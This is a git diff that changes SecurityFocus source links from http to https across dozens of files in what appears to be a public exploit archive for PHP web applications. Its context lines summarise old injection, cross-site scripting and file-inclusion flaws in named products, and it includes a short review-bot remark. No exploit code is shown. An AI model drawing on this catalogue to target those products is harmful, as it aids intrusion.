@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23953.txt b/exploits/php/webapps/23953.txt index 297156f50..f9baa318c 100644 --- a/exploits/php/webapps/23953.txt +++ b/exploits/php/webapps/23953.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23954.txt b/exploits/php/webapps/23954.txt index 3ec64a04e..c591bb512 100644 --- a/exploits/php/webapps/23954.txt +++ b/exploits/php/webapps/23954.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23955.txt b/exploits/php/webapps/23955.txt index 562792102..4d37dece1 100644 --- a/exploits/php/webapps/23955.txt +++ b/exploits/php/webapps/23955.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23956.txt b/exploits/php/webapps/23956.txt index 450d7a886..437c9acdb 100644 --- a/exploits/php/webapps/23956.txt +++ b/exploits/php/webapps/23956.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23957.txt b/exploits/php/webapps/23957.txt index 9b484fff1..9248e99c2 100644 --- a/exploits/php/webapps/23957.txt +++ b/exploits/php/webapps/23957.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23958.txt b/exploits/php/webapps/23958.txt index d66644b30..fa3284533 100644 --- a/exploits/php/webapps/23958.txt +++ b/exploits/php/webapps/23958.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23959.txt b/exploits/php/webapps/23959.txt index f1a02475d..8bb723bbb 100644 --- a/exploits/php/webapps/23959.txt +++ b/exploits/php/webapps/23959.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23960.txt b/exploits/php/webapps/23960.txt index 127a805e0..7d7035814 100644 --- a/exploits/php/webapps/23960.txt +++ b/exploits/php/webapps/23960.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23961.txt b/exploits/php/webapps/23961.txt index 1f005727d..b03f3e5fb 100644 --- a/exploits/php/webapps/23961.txt +++ b/exploits/php/webapps/23961.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23962.txt b/exploits/php/webapps/23962.txt index d1b555781..4011dc138 100644 --- a/exploits/php/webapps/23962.txt +++ b/exploits/php/webapps/23962.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23963.txt b/exploits/php/webapps/23963.txt index 081fd282f..5b7f6920c 100644 --- a/exploits/php/webapps/23963.txt +++ b/exploits/php/webapps/23963.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23964.txt b/exploits/php/webapps/23964.txt index b4e63312c..b09243db6 100644 --- a/exploits/php/webapps/23964.txt +++ b/exploits/php/webapps/23964.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23965.txt b/exploits/php/webapps/23965.txt index cdff9748c..f3611c5c6 100644 --- a/exploits/php/webapps/23965.txt +++ b/exploits/php/webapps/23965.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23966.txt b/exploits/php/webapps/23966.txt index cdc9f5a69..8c046070a 100644 --- a/exploits/php/webapps/23966.txt +++ b/exploits/php/webapps/23966.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23971.txt b/exploits/php/webapps/23971.txt index 496659305..e37f22532 100644 --- a/exploits/php/webapps/23971.txt +++ b/exploits/php/webapps/23971.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23972.txt b/exploits/php/webapps/23972.txt index a58989e9a..292f3353c 100644 --- a/exploits/php/webapps/23972.txt +++ b/exploits/php/webapps/23972.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23973.txt b/exploits/php/webapps/23973.txt index 67c9ff2df..b639cb725 100644 --- a/exploits/php/webapps/23973.txt +++ b/exploits/php/webapps/23973.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23974.txt b/exploits/php/webapps/23974.txt index 828272b9b..193c82799 100644 --- a/exploits/php/webapps/23974.txt +++ b/exploits/php/webapps/23974.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23975.txt b/exploits/php/webapps/23975.txt index 20dad187f..87903f8c5 100644 --- a/exploits/php/webapps/23975.txt +++ b/exploits/php/webapps/23975.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23976.txt b/exploits/php/webapps/23976.txt index bb7b706bf..f35533bc1 100644 --- a/exploits/php/webapps/23976.txt +++ b/exploits/php/webapps/23976.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23977.txt b/exploits/php/webapps/23977.txt index 8d30e56bc..2ba1d6cb5 100644 --- a/exploits/php/webapps/23977.txt +++ b/exploits/php/webapps/23977.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23978.txt b/exploits/php/webapps/23978.txt index cd4199125..c70e1714a 100644 --- a/exploits/php/webapps/23978.txt +++ b/exploits/php/webapps/23978.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23982.txt b/exploits/php/webapps/23982.txt index 20834bd9a..4cb4ba5a8 100644 --- a/exploits/php/webapps/23982.txt +++ b/exploits/php/webapps/23982.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23983.txt b/exploits/php/webapps/23983.txt index 7ee27db55..6fe97205e 100644 --- a/exploits/php/webapps/23983.txt +++ b/exploits/php/webapps/23983.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23984.txt b/exploits/php/webapps/23984.txt index e09159783..3b5128385 100644 --- a/exploits/php/webapps/23984.txt +++ b/exploits/php/webapps/23984.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23988.txt b/exploits/php/webapps/23988.txt index 1d4581812..acbbd0036 100644 --- a/exploits/php/webapps/23988.txt +++ b/exploits/php/webapps/23988.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10104/info +source: https://www.securityfocus.com/bid/10104/info Nuked-Klan is prone to multiple vulnerabilities. These issues include information disclosure via inclusion of local files, an issue that may permit remote attackers to corrupt configuration files and an SQL injection vulnerability. diff --git a/exploits/php/webapps/23990.txt b/exploits/php/webapps/23990.txt index 015fd80dd..f83ee4f9f 100644 --- a/exploits/php/webapps/23990.txt +++ b/exploits/php/webapps/23990.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10128/info +source: https://www.securityfocus.com/bid/10128/info Reportedly PHP-NuKe is prone to a remote cross-site scripting vulnerability. This issue is due to a failure of the 'cookiedecode()' function to properly sanitize user supplied cookie parameters. diff --git a/exploits/php/webapps/23991.txt b/exploits/php/webapps/23991.txt index c3b08751f..a0c6a63e7 100644 --- a/exploits/php/webapps/23991.txt +++ b/exploits/php/webapps/23991.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10129/info +source: https://www.securityfocus.com/bid/10129/info Multiple vulnerabilities have been identified in various modules of TUTOS. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, and possibly SQL injection. diff --git a/exploits/php/webapps/23998.txt b/exploits/php/webapps/23998.txt index 1c9eb85fc..cee20a67e 100644 --- a/exploits/php/webapps/23998.txt +++ b/exploits/php/webapps/23998.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10135/info +source: https://www.securityfocus.com/bid/10135/info Reportedly PHP-Nuke is prone to multiple SQL injection vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied input. diff --git a/exploits/php/webapps/24003.txt b/exploits/php/webapps/24003.txt index 4fc2720fa..895363f84 100644 --- a/exploits/php/webapps/24003.txt +++ b/exploits/php/webapps/24003.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10153/info +source: https://www.securityfocus.com/bid/10153/info Reportedly phpBugTracker contains multiple input validation vulnerabilities; it is prone to multiple SQL injection, cross-site scripting and HTML injection issues. These issues are all due to a failure of the application to properly sanitize user supplied input. 
diff --git a/exploits/php/webapps/24004.txt b/exploits/php/webapps/24004.txt index 79395294a..5ea19db57 100644 --- a/exploits/php/webapps/24004.txt +++ b/exploits/php/webapps/24004.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10153/info +source: https://www.securityfocus.com/bid/10153/info Reportedly phpBugTracker contains multiple input validation vulnerabilities; it is prone to multiple SQL injection, cross-site scripting and HTML injection issues. These issues are all due to a failure of the application to properly sanitize user supplied input. diff --git a/exploits/php/webapps/24005.txt b/exploits/php/webapps/24005.txt index 5e5b126ea..e1d47008a 100644 --- a/exploits/php/webapps/24005.txt +++ b/exploits/php/webapps/24005.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10153/info +source: https://www.securityfocus.com/bid/10153/info Reportedly phpBugTracker contains multiple input validation vulnerabilities; it is prone to multiple SQL injection, cross-site scripting and HTML injection issues. These issues are all due to a failure of the application to properly sanitize user supplied input. diff --git a/exploits/php/webapps/24006.txt b/exploits/php/webapps/24006.txt index 81a896130..43dc891af 100644 --- a/exploits/php/webapps/24006.txt +++ b/exploits/php/webapps/24006.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10153/info +source: https://www.securityfocus.com/bid/10153/info Reportedly phpBugTracker contains multiple input validation vulnerabilities; it is prone to multiple SQL injection, cross-site scripting and HTML injection issues. These issues are all due to a failure of the application to properly sanitize user supplied input. diff --git a/exploits/php/webapps/24007.txt b/exploits/php/webapps/24007.txt index 6a2f5d4e4..f6de2b8d1 100644 --- a/exploits/php/webapps/24007.txt +++ b/exploits/php/webapps/24007.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10153/info +source: https://www.securityfocus.com/bid/10153/info Reportedly phpBugTracker contains multiple input validation vulnerabilities; it is prone to multiple SQL injection, cross-site scripting and HTML injection issues. These issues are all due to a failure of the application to properly sanitize user supplied input. diff --git a/exploits/php/webapps/24008.html b/exploits/php/webapps/24008.html index bb51c7a44..048dc8b11 100644 --- a/exploits/php/webapps/24008.html +++ b/exploits/php/webapps/24008.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10154/info +source: https://www.securityfocus.com/bid/10154/info It has been reported that Campus Pipeline is prone to a remote email attachment script injection vulnerability. This issue is due to a failure of the application to properly sanitize user supplied HTML and script code contained in email documents. diff --git a/exploits/php/webapps/24009.txt b/exploits/php/webapps/24009.txt index 7dc9570aa..83a26eaab 100644 --- a/exploits/php/webapps/24009.txt +++ b/exploits/php/webapps/24009.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10156/info +source: https://www.securityfocus.com/bid/10156/info A vulnerability has been identified in the handling of input by Gemitel. Because of this, it may be possible for a remote user to gain unauthorized access to a system using the vulnerable software. diff --git a/exploits/php/webapps/24016.txt b/exploits/php/webapps/24016.txt index 46a7c8348..fc518b742 100644 --- a/exploits/php/webapps/24016.txt +++ b/exploits/php/webapps/24016.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10173/info +source: https://www.securityfocus.com/bid/10173/info Reportedly Phorum is affected by a remote SQL injection vulnerability. This issue is due to a failure of the application to properly sanitized user supplied URI input. 
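Review bot: In the exploits/php/webapps/24008.html hunk above, the `source:` header on line 1 and the description that follows it are bare text at the top of a file with an .html extension, so the rewritten URL and the advisory text are part of the document body rather than a comment. The scheme change itself is fine, but it is worth confirming whether .html entries are meant to carry the header inside an HTML comment (`<!-- source: ... -->`), and handling that in a separate change so this commit stays a pure URL rewrite.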
diff --git a/exploits/php/webapps/24026.txt b/exploits/php/webapps/24026.txt index 18b7b0251..2c77fc1ad 100644 --- a/exploits/php/webapps/24026.txt +++ b/exploits/php/webapps/24026.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10177/info +source: https://www.securityfocus.com/bid/10177/info It has been reported that phpBB may be prone to a file include vulnerability that may allow remote attackers to include a remote malicious script to be executed on a vulnerable system. diff --git a/exploits/php/webapps/24034.txt b/exploits/php/webapps/24034.txt index 58b83fa02..eea97bb59 100644 --- a/exploits/php/webapps/24034.txt +++ b/exploits/php/webapps/24034.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10190/info +source: https://www.securityfocus.com/bid/10190/info Multiple vulnerabilities were reported to exist in phProfession, which is a third-party module for PostNuke. Path disclosure, cross-site scripting and SQL injection vulnerabilities were reported. diff --git a/exploits/php/webapps/24035.txt b/exploits/php/webapps/24035.txt index 93ed5ebfd..42eba40c5 100644 --- a/exploits/php/webapps/24035.txt +++ b/exploits/php/webapps/24035.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10190/info +source: https://www.securityfocus.com/bid/10190/info Multiple vulnerabilities were reported to exist in phProfession, which is a third-party module for PostNuke. Path disclosure, cross-site scripting and SQL injection vulnerabilities were reported. diff --git a/exploits/php/webapps/24036.txt b/exploits/php/webapps/24036.txt index c7151c756..aaf50030f 100644 --- a/exploits/php/webapps/24036.txt +++ b/exploits/php/webapps/24036.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10190/info +source: https://www.securityfocus.com/bid/10190/info Multiple vulnerabilities were reported to exist in phProfession, which is a third-party module for PostNuke. Path disclosure, cross-site scripting and SQL injection vulnerabilities were reported. diff --git a/exploits/php/webapps/24037.txt b/exploits/php/webapps/24037.txt index 1cfc69395..9e3eb144e 100644 --- a/exploits/php/webapps/24037.txt +++ b/exploits/php/webapps/24037.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10191/info +source: https://www.securityfocus.com/bid/10191/info Multiple vulnerabilities were reported to exist in PostNuke Phoenix. The following specific vulnerabilities were reported: diff --git a/exploits/php/webapps/24046.txt b/exploits/php/webapps/24046.txt index 27f6eca04..33f92704c 100644 --- a/exploits/php/webapps/24046.txt +++ b/exploits/php/webapps/24046.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10203/info +source: https://www.securityfocus.com/bid/10203/info An attacker may be capable of executing arbitrary script code in a browser of a target user and within the context of a visited web site. This may potentially lead to theft of cookie based authentication credentials, other attacks are also possible. diff --git a/exploits/php/webapps/24047.txt b/exploits/php/webapps/24047.txt index 39c7cce73..697ec5372 100644 --- a/exploits/php/webapps/24047.txt +++ b/exploits/php/webapps/24047.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10206/info +source: https://www.securityfocus.com/bid/10206/info Multiple vulnerabilities were reported to exist in Protector System, which is a third-party module for PHP-Nuke. Cross-site scripting and SQL injection vulnerabilities were reported. diff --git a/exploits/php/webapps/24048.txt b/exploits/php/webapps/24048.txt index 11c7902c2..6ea2e79b0 100644 --- a/exploits/php/webapps/24048.txt +++ b/exploits/php/webapps/24048.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10206/info +source: https://www.securityfocus.com/bid/10206/info Multiple vulnerabilities were reported to exist in Protector System, which is a third-party module for PHP-Nuke. Cross-site scripting and SQL injection vulnerabilities were reported. diff --git a/exploits/php/webapps/24050.txt b/exploits/php/webapps/24050.txt index b827242bb..17c11fa6e 100644 --- a/exploits/php/webapps/24050.txt +++ b/exploits/php/webapps/24050.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10209/info +source: https://www.securityfocus.com/bid/10209/info It has been reported that Advanced Guestbook is prone to a SQL injection vulnerability that could allow an attacker to gain administrative access to the application. diff --git a/exploits/php/webapps/24052.txt b/exploits/php/webapps/24052.txt index c0b2acd2a..9fdae8e74 100644 --- a/exploits/php/webapps/24052.txt +++ b/exploits/php/webapps/24052.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10214/info +source: https://www.securityfocus.com/bid/10214/info It has been reported that OpenBB is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied user input. diff --git a/exploits/php/webapps/24053.txt b/exploits/php/webapps/24053.txt index bdd6207dc..a397476d8 100644 --- a/exploits/php/webapps/24053.txt +++ b/exploits/php/webapps/24053.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10214/info +source: https://www.securityfocus.com/bid/10214/info It has been reported that OpenBB is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied user input. diff --git a/exploits/php/webapps/24054.txt b/exploits/php/webapps/24054.txt index 4fe3f3c70..20fffaae5 100644 --- a/exploits/php/webapps/24054.txt +++ b/exploits/php/webapps/24054.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10214/info +source: https://www.securityfocus.com/bid/10214/info It has been reported that OpenBB is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied user input. diff --git a/exploits/php/webapps/24055.txt b/exploits/php/webapps/24055.txt index 5a7a5325c..90fef55ea 100644 --- a/exploits/php/webapps/24055.txt +++ b/exploits/php/webapps/24055.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10214/info +source: https://www.securityfocus.com/bid/10214/info It has been reported that OpenBB is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied user input. diff --git a/exploits/php/webapps/24056.txt b/exploits/php/webapps/24056.txt index 131842343..b463d8890 100644 --- a/exploits/php/webapps/24056.txt +++ b/exploits/php/webapps/24056.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10214/info +source: https://www.securityfocus.com/bid/10214/info It has been reported that OpenBB is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied user input. diff --git a/exploits/php/webapps/24057.txt b/exploits/php/webapps/24057.txt index fda36f619..68e373b81 100644 --- a/exploits/php/webapps/24057.txt +++ b/exploits/php/webapps/24057.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10214/info +source: https://www.securityfocus.com/bid/10214/info It has been reported that OpenBB is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied user input. diff --git a/exploits/php/webapps/24058.txt b/exploits/php/webapps/24058.txt index 117742224..068361aab 100644 --- a/exploits/php/webapps/24058.txt +++ b/exploits/php/webapps/24058.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10214/info +source: https://www.securityfocus.com/bid/10214/info It has been reported that OpenBB is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied user input. diff --git a/exploits/php/webapps/24059.txt b/exploits/php/webapps/24059.txt index bc9fd8f42..fc33c7779 100644 --- a/exploits/php/webapps/24059.txt +++ b/exploits/php/webapps/24059.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10214/info +source: https://www.securityfocus.com/bid/10214/info It has been reported that OpenBB is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied user input. diff --git a/exploits/php/webapps/24060.txt b/exploits/php/webapps/24060.txt index 8a4ae131f..44a2704b6 100644 --- a/exploits/php/webapps/24060.txt +++ b/exploits/php/webapps/24060.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10215/info +source: https://www.securityfocus.com/bid/10215/info Reportedly the PHP-Nuke Video Gallery module is affected by multiple SQL injection vulnerabilities. This is due to a failure of the application to properly sanitize user-supplied input prior to using it in an SQL query. diff --git a/exploits/php/webapps/24061.txt b/exploits/php/webapps/24061.txt index aa5bf029d..35615e034 100644 --- a/exploits/php/webapps/24061.txt +++ b/exploits/php/webapps/24061.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10217/info +source: https://www.securityfocus.com/bid/10217/info It has been reported that OpenBB is affected by a private message disclosure vulnerability. This issue is due to a design error that fails to validate user credentials. diff --git a/exploits/php/webapps/24068.txt b/exploits/php/webapps/24068.txt index f8cba1dd5..fb94619fd 100644 --- a/exploits/php/webapps/24068.txt 
+++ b/exploits/php/webapps/24068.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10246/info +source: https://www.securityfocus.com/bid/10246/info It has been reported that SquirrelMail is affected by a cross-site scripting vulnerability in the handling of folder name displays. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamic web content. diff --git a/exploits/php/webapps/24071.txt b/exploits/php/webapps/24071.txt index 550b8d08c..d3d4640c1 100644 --- a/exploits/php/webapps/24071.txt +++ b/exploits/php/webapps/24071.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10251/info +source: https://www.securityfocus.com/bid/10251/info It has been reported that Moodle is susceptible to a cross-site scripting vulnerability in the 'help.php' script. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamic web content. diff --git a/exploits/php/webapps/24072.txt b/exploits/php/webapps/24072.txt index 23d057570..dfea9b837 100644 --- a/exploits/php/webapps/24072.txt +++ b/exploits/php/webapps/24072.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10253/info +source: https://www.securityfocus.com/bid/10253/info Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly sanitize and validate user-supplied input before using it in dynamic content and in function calls that execute system commands. diff --git a/exploits/php/webapps/24073.txt b/exploits/php/webapps/24073.txt index 72e7fbc14..574122b9d 100644 --- a/exploits/php/webapps/24073.txt +++ b/exploits/php/webapps/24073.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10253/info +source: https://www.securityfocus.com/bid/10253/info Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly sanitize and validate user-supplied input before using it in dynamic content and in function calls that execute system commands. diff --git a/exploits/php/webapps/24074.txt b/exploits/php/webapps/24074.txt index d011fa560..2a2649a3c 100644 --- a/exploits/php/webapps/24074.txt +++ b/exploits/php/webapps/24074.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10253/info +source: https://www.securityfocus.com/bid/10253/info Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly sanitize and validate user-supplied input before using it in dynamic content and in function calls that execute system commands. diff --git a/exploits/php/webapps/24075.txt b/exploits/php/webapps/24075.txt index e2dfb03df..b868d6a3c 100644 --- a/exploits/php/webapps/24075.txt +++ b/exploits/php/webapps/24075.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10253/info +source: https://www.securityfocus.com/bid/10253/info Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly sanitize and validate user-supplied input before using it in dynamic content and in function calls that execute system commands. diff --git a/exploits/php/webapps/24082.txt b/exploits/php/webapps/24082.txt index c56d5978c..4977f1d03 100644 --- a/exploits/php/webapps/24082.txt +++ b/exploits/php/webapps/24082.txt 
